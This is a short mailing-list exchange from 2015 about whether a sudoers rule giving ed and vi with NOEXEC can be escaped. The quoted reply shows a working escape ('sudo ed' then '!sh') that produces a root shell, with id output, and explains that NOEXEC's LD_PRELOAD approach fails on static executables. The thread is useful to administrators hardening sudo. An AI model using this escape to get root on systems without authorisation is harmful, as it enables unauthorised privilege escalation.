"Yeah, that LD_PRELOAD trick NOEXEC uses doesn't work so well with static executables."
Thank you, so there is a way tricking noexec with vi to get a root shell. But how exactly? Why isn't it fixed? :O On Mon, Apr 27, 2015 at 9:49 PM, Christian Weisgerber <na...@mips.inka.de> wrote: > On 2015-04-27, "whynot sudo" <whynots...@safe-mail.net> wrote: > > > Cmnd_Alias FOO = /bin/ed, /usr/bin/ed, /usr/bin/vi > > foouser LOCALHOST = NOPASSWD: NOEXEC: FOO > > > > Can the "foouser" escape to root prompt? > > Let's try! > > $ sudo ed > !sh > # id > uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), > 5(operator), 20(staff), 31(guest) > # > > Yeah, that LD_PRELOAD trick NOEXEC uses doesn't work so well with > static executables. > > -- > Christian "naddy" Weisgerber na...@mips.inka.de